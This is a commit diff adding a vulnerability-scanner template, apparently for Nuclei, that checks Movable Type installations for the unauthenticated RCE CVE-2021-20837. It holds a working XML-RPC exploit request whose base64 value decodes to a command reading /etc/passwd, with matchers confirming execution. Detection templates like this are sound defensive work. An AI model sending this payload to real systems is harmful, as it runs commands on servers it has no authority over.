Merge pull request #3516 from pikpikcu/patch-315

Create CVE-2021–20837
2022-01-11 14:24:26 +05:30 · 2022-01-11 14:24:26 +05:30 · 5657bdb557
parent e5407e9263 70677b3b5a
commit 5657bdb557
1 changed files with 44 additions and 0 deletions
--- a/cves/2021/CVE-2021–20837.yaml
+++ b/cves/2021/CVE-2021–20837.yaml
@ -0,0 +1,44 @@
+id: CVE-2021-20837
+info:
+  name: Unauthenticated RCE Vulnerability In MovableType
+  author: pikpikcu
+  severity: critical
+  description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
+  reference:
+    - https://medium.com/@TutorialBoy24/an-unauthenticated-rce-vulnerability-in-movabletype-cve-2021-20837-70664b159dd7
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20837
+  tags: cve,cve2021,movabletype,rce
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <?xml version="1.0"?>
+        <methodCall>
+          <methodName>mt.handler_to_coderef</methodName>
+          <params>
+            <param>
+              <value><base64>YGNhdCAvZXRjL3Bhc3N3ZGA=</base64>
+              </value>
+            </param>
+          </params>
+        </methodCall>
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/xml"